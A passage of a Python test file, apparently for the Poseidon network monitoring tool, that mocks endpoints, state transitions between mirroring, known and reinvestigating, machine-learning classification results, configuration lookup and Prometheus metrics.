"ip": "10.176.143.99", \
"mac": "20:4c:9e:5f:e3:c4", \
"segment": "to-core-router", \
"port": null, \
"tenant": "EXTERNAL", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 0, \
"hash": "6b961fd660269dd1384605bd439ffb197fd53f0f", \
"state": "KNOWN", \
"active": 1 \
}, \
{ \
"ip": "10.177.0.253", \
"mac": "52:54:00:66:df:67", \
"segment": "prod", \
"port": null, \
"tenant": "ESX", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 0, \
"hash": "b8d31352453a65036b4343f34c2a93f5d5442b70", \
"state": "KNOWN", \
"active": 0 \
}, \
{ \
"ip": "10.176.143.1", \
"mac": "18:66:da:7f:35:60", \
"segment": "to-core-router", \
"port": null, \
"tenant": "EXTERNAL", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 1, \
"hash": "bc3e82c8672ab19e5c3959d8135b873297209ff4", \
"state": "KNOWN", \
"active": 1 \
}]}')
mock_response.json = mock_json
return None
mock_response.text = ("(True, [{'status': u'exited', 'args': [u'enp3s0',"
" u'900', u'test0', u'1', "
"u'host 192.168.0.30'], 'id': u'0bce1351109e'}, {'status': u'exited', "
"'args': [u'enp3s0', u'900', u'test1', "
"u'1', u'host 192.168.0.30'], 'id': u'c1a662efea1c'}, {'status': u'running', "
"'args': [u'enp3s0', u'900', u'test2', "
"u'1', u'host 192.168.0.30'], 'id': u'2602280bb9da'}])")
# cover object
a = mock_response()
b = mock_response.json()
assert a is None
assert isinstance(b, dict)
return mock_response
poseidonMonitor.CTRL_C['STOP'] = False
poseidonMonitor.requests = requests()
class Mock_Update_Switch_State():
def __init__(self):
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE')
})
self.endpoints = Endpoint_Wrapper()
for s in stuff:
self.endpoints.state[s] = stuff[s]
self.logger = None
class MockMonitor(Monitor):
def __init__(self):
self.mod_configuration = dict({
'reinvestigation_frequency': 900,
'collector_nic': 2,
'vent_ip': '0.0.0.0',
'vent_port': '8080',
})
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
self.uss = Mock_Update_Switch_State()
mock_monitor = MockMonitor()
mock_monitor.logger = MockLogger().logger
dev_hash = 'test0'
result = mock_monitor.host_has_active_collectors(dev_hash)
assert result == True
def test_get_q_item():
class MockMQueue:
def get(self, block):
return 'Item'
poseidonMonitor.CTRL_C['STOP'] = False
class MockMonitor(Monitor):
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
mock_monitor = MockMonitor()
mock_monitor.m_queue = MockMQueue()
assert (True, 'Item') == mock_monitor.get_q_item()
poseidonMonitor.CTRL_C['STOP'] = True
mock_monitor.m_queue = MockMQueue()
assert (False, None) == mock_monitor.get_q_item()
def test_format_rabbit_message():
poseidonMonitor.CTRL_C['STOP'] = False
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class MockMonitor(Monitor):
def __init__(self):
self.fa_rabbit_routing_key = 'foo'
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
mockMonitor = MockMonitor()
mockMonitor.logger = MockLogger().logger
data = dict({'Key1': 'Val1'})
message = ('poseidon.algos.decider', json.dumps(data))
retval = mockMonitor.format_rabbit_message(message)
assert retval == data
message = (None, json.dumps(data))
retval = mockMonitor.format_rabbit_message(message)
assert retval == {}
def test_rabbit_callback():
def mock_method(): return True
mock_method.routing_key = 'test_routing_key'
# force mock_method coverage
assert mock_method()
class MockQueue:
item = None
def put(self, item):
self.item = item
return True
# used for testing to verify that we put right stuff there
def get_item(self):
return self.item
mock_queue = MockQueue()
poseidonMonitor.rabbit_callback(
'Channel',
mock_method,
'properties',
'body',
mock_queue)
assert mock_queue.get_item() == (mock_method.routing_key, 'body')
poseidonMonitor.rabbit_callback(
'Channel',
mock_method,
'properties',
'body',
None)
def test_schedule_job_reinvestigation():
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
epw = Endpoint_Wrapper()
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='UNKNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='REINVESTIGATING'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='KNOWN', next_state='UNKNOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='REINVESTIGATING')
})
for s in stuff:
epw.state[s] = stuff[s]
assert len(epw.state) == 9
poseidonMonitor.schedule_job_reinvestigation(9, epw, MockLogger().logger)
epw = Endpoint_Wrapper()
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='UNKNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='REINVESTIGATING'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='KNOWN', next_state='UNKNOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='REINVESTIGATING'),
'c60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='REINVESTIGATING'),
'c60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='REINVESTIGATING'),
'c60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='OTHER-STATE', next_state='UNKNOWN')
})
# end_points = {
# "hash_0": {"state": "REINVESTIGATING", "next-state": "UNKNOWN"},
# "hash_1": {"state": "UNKNOWN", "next-state": "REINVESTIGATING"},
# "hash_2": {"state": "KNOWN", "next-state": "UNKNOWN"},
# "hash_3": {"state": "UNKNOWN", "next-state": "REINVESTIGATING"},
# "hash_4": {"state": "UNKNOWN", "next-state": "REINVESTIGATING"},
# "hash_5": {"state": "UNKNOWN", "next-state": "REINVESTIGATING"},
# "hash_6": {"state": "OTHER-STATE", "next-state": "UNKNOWN"}
# }
for s in stuff:
epw.state[s] = stuff[s]
poseidonMonitor.schedule_job_reinvestigation(4, epw, MockLogger().logger)
epw = Endpoint_Wrapper()
#end_points = {}
poseidonMonitor.schedule_job_reinvestigation(4, epw, MockLogger().logger)
epw.state['4ee39d254db3e4a5264b75ce8ae312d69f9e73a3'] = stuff['4ee39d254db3e4a5264b75ce8ae312d69f9e73a3']
#end_points = {"hash_0": {"MALFORMED": "YES"}}
poseidonMonitor.schedule_job_reinvestigation(4, epw, MockLogger().logger)
def test_update_next_state():
class MockLogger():
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class Mock_Update_Switch_State():
def __init__(self):
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE')
})
self.endpoints = Endpoint_Wrapper()
for s in stuff:
self.endpoints.state[s] = stuff[s]
self.logger = None
def return_endpoint_state(self):
return self.endpoints
class MockMonitor(Monitor):
def __init__(self):
self.uss = None
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
monitor = MockMonitor()
monitor.uss = Mock_Update_Switch_State()
monitor.logger = MockLogger().logger
ml_return = {
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': {
'valid': True, 'classification': {
'labels': [
'Unknown', 'Smartphone', 'Developer workstation'], 'confidences': [
0.9983864533039954, 0.0010041873867962805, 0.00042691313815914093]}, 'timestamp': 1508366767.45571, 'decisions': {
'investigate': True, 'behavior': 'normal'}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': {
'valid': True, 'classification': {
'labels': [
'Unknown', 'Smartphone', 'Developer workstation'], 'confidences': [
0.9983864533039954, 0.0010041873867962805, 0.00042691313815914093]}, 'timestamp': 1508366767.45571, 'decisions': {
'investigate': True, 'behavior': 'abnormal'}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': {
'valid': True, 'classification': {
'labels': [
'Unknown', 'Smartphone', 'Developer workstation'], 'confidences': [
0.9983864533039954, 0.0010041873867962805, 0.00042691313815914093]}, 'timestamp': 1508366767.45571, 'decisions': {
'investigate': True, 'behavior': 'normal'}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': {
'valid': True, 'classification': {
'labels': [
'Unknown', 'Smartphone', 'Developer workstation'], 'confidences': [
0.9983864533039954, 0.0010041873867962805, 0.00042691313815914093]}, 'timestamp': 1508366767.45571, 'decisions': {
'investigate': True, 'behavior': 'abnormal'}}}
monitor.update_next_state(ml_return)
correct_answer = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': {
'state': 'UNKNOWN',
'next-state': 'MIRRORING',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': {
'state': 'UNKNOWN',
'next-state': 'MIRRORING',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': {
'state': 'UNKNOWN',
'next-state': 'KNOWN',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': {
'state': 'MIRRORING',
'next-state': 'KNOWN',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': {
'state': 'KNOWN',
'next-state': 'REINVESTIGATING',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None}},
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': {
'state': 'UNKNOWN',
'next-state': 'MIRRORING',
'endpoint': {
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': {
'state': 'MIRRORING',
'next-state': 'KNOWN',
'endpoint': {
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': {
'state': 'MIRRORING',
'next-state': 'SHUTDOWN',
'endpoint': {
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': {
'state': 'REINVESTIGATING',
'next-state': 'KNOWN',
'endpoint': {
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None}},
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': {
'state': 'REINVESTIGATING',
'next-state': 'UNKNOWN',
'endpoint': {
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None}}})
eps = monitor.uss.return_endpoint_state().state
for key in correct_answer:
assert eps[key].next_state == correct_answer[key]['next-state']
ml_return = {
'NOT_FOUND': {
'valid': True,
'classification': {
'labels': [
'Unknown',
'Smartphone',
'Developer workstation'],
'confidences': [
0.9983864533039954,
0.0010041873867962805,
0.00042691313815914093]},
'timestamp': 1508366767.45571,
'decisions': {
'investigate': True,
'behavior': 'normal'}}}
monitor.update_next_state(ml_return)
ml_return = {
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': {
'valid': False,
'classification': {
'labels': [
'Unknown',
'Smartphone',
'Developer workstation'],
'confidences': [
0.9983864533039954,
0.0010041873867962805,
0.00042691313815914093]},
'timestamp': 1508366767.45571,
'decisions': {
'investigate': True,
'behavior': 'normal'}}}
monitor.update_next_state(ml_return)
def test_configSelf():
class MockMonitor(Monitor):
def __init__(self):
self.mod_name = None
self.mod_configuration = dict()
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class MockConfig():
def __init__(self):
pass
def get_endpoint(self, sectionType):
return MockConfig()
def direct_get(self, name):
ret_val = dict()
ret_val[1] = 'one'
ret_val[2] = 'two'
ret_val[3] = 'three'
return [(x, ret_val[x]) for x in ret_val]
class MockLogger():
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
monitor = MockMonitor()
monitor.logger = MockLogger().logger
monitor.Config = MockConfig()
monitor.configSelf()
answer = dict({1: 'one', 2: 'two', 3: 'three'})
assert str(answer) == str(dict(monitor.mod_configuration))
def test_configSelf2():
class MockMonitor(Monitor):
def __init__(self):
self.mod_name = 'testingConfigSelf'
self.mod_configuration = [1, 2, 3, 4]
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class MockSectionConfig():
def __init__(self):
pass
def direct_get(self, mod_name):
assert 'testingConfigSelf' == mod_name
return [(1, 'YOYO')]
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class MockConfig():
def __init__(self):
pass
def get_endpoint(self, endpoint_type):
assert 'Handle_SectionConfig' == endpoint_type
section_conf = MockSectionConfig()
return section_conf
mock_monitor = MockMonitor()
mock_monitor.Config = MockConfig()
mock_monitor.logger = MockLogger().logger
mock_monitor.configSelf()
assert mock_monitor.mod_configuration[1] == 'YOYO'
def test_schedule_job_kickurl():
class MockLogger():
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
def error(self, msg):
pass
class helper():
def __init__(self):
pass
def update_endpoint_state(self, messages=None):
pass
class MockNorthBoundControllerAbstraction():
def __init__(self):
pass
def get_endpoint(self, some_word):
return helper()
class func():
def __init__(self):
self.faucet_event = []
self.prom_metrics = {}
self.prom_metrics['inactive'] = Gauge('poseidon_endpoint_inactive',
'Number of endpoints that are inactive')
self.prom_metrics['active'] = Gauge('poseidon_endpoint_active',
'Number of endpoints that are active')
self.prom_metrics['behavior'] = Gauge('poseidon_endpoint_behavior',
'Behavior of an endpoint, 0 is normal, 1 is abnormal',
['ip',
'mac',
'tenant',
'segment',
'port',
'role',
'os',
'record_source'])
self.prom_metrics['ip_table'] = Gauge('poseidon_endpoint_ip_table',
'IP Table',
['mac',
'tenant',
'segment',
'port',
'role',
'os',
'hash_id',
'record_source'])
self.prom_metrics['roles'] = Gauge('poseidon_endpoint_roles',
'Number of endpoints by role',
['record_source',
'role'])
self.prom_metrics['oses'] = Gauge('poseidon_endpoint_oses',
'Number of endpoints by OS',
['record_source',
'os'])
self.prom_metrics['current_states'] = Gauge('poseidon_endpoint_current_states',
'Number of endpoints by current state',
['record_source',
'current_state'])
self.prom_metrics['vlans'] = Gauge('poseidon_endpoint_vlans',
'Number of endpoints by VLAN',
['record_source',
'tenant'])
self.prom_metrics['record_sources'] = Gauge('poseidon_endpoint_record_sources',
'Number of endpoints by record source',
['record_source'])
self.prom_metrics['port_tenants'] = Gauge('poseidon_endpoint_port_tenants',
'Number of tenants by port',
['port',
'tenant'])
self.prom_metrics['port_hosts'] = Gauge('poseidon_endpoint_port_hosts',
'Number of hosts by port',
['port'])
self.NorthBoundControllerAbstraction = MockNorthBoundControllerAbstraction()
schedule_job_kickurl(func(), MockLogger().logger)
def test_Monitor_init():
monitor = Monitor(skip_rabbit=True)
def test_process():
from threading import Thread
import time
def thread1():
global CTRL_C
CTRL_C['STOP'] = False
time.sleep(5)
CTRL_C['STOP'] = True
class MockLogger():
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class MockEndpoint(Endpoint_Wrapper):
def __init__(self):
super(MockEndpoint, self).__init__()
def configSelf(self):
self.mod_configuration = {
'vent_ip': '0.0.0.0',
'vent_port': '8080'
}
def print_endpoint_state(self):
return ''
def makedata(self):
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 0,
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'active': 1,
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'active': 1,
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aab': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'active': 1,
'name': None},
prev_state='NONE', state='KNOWN', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'active': 1,
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='KNOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'active': 1,
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE')
})
for s in stuff:
self.state[s] = stuff[s]
class MockUss():
def __init__(self):
self.endpoints = MockEndpoint()
self.endpoints.makedata()
def mirror_endpoint(self, endpoint_hash, messages=None):
return None
def unmirror_endpoint(self, endpoint_hash, messages=None):
return None
def shutdown_endpoint(self, endpoint_hash, messages=None):
return None
def change_endpoint_state(self, endpoint_hash):
return None
def return_endpoint_state(self):
return self.endpoints
class MockMonitor(Monitor):
def __init__(self):
self.mod_configuration = {
'reinvestigation_frequency': 900,
'collector_nic': 2,
'vent_ip': '0.0.0.0',
'vent_port': '8080'
}
self.logger = Logger.logger
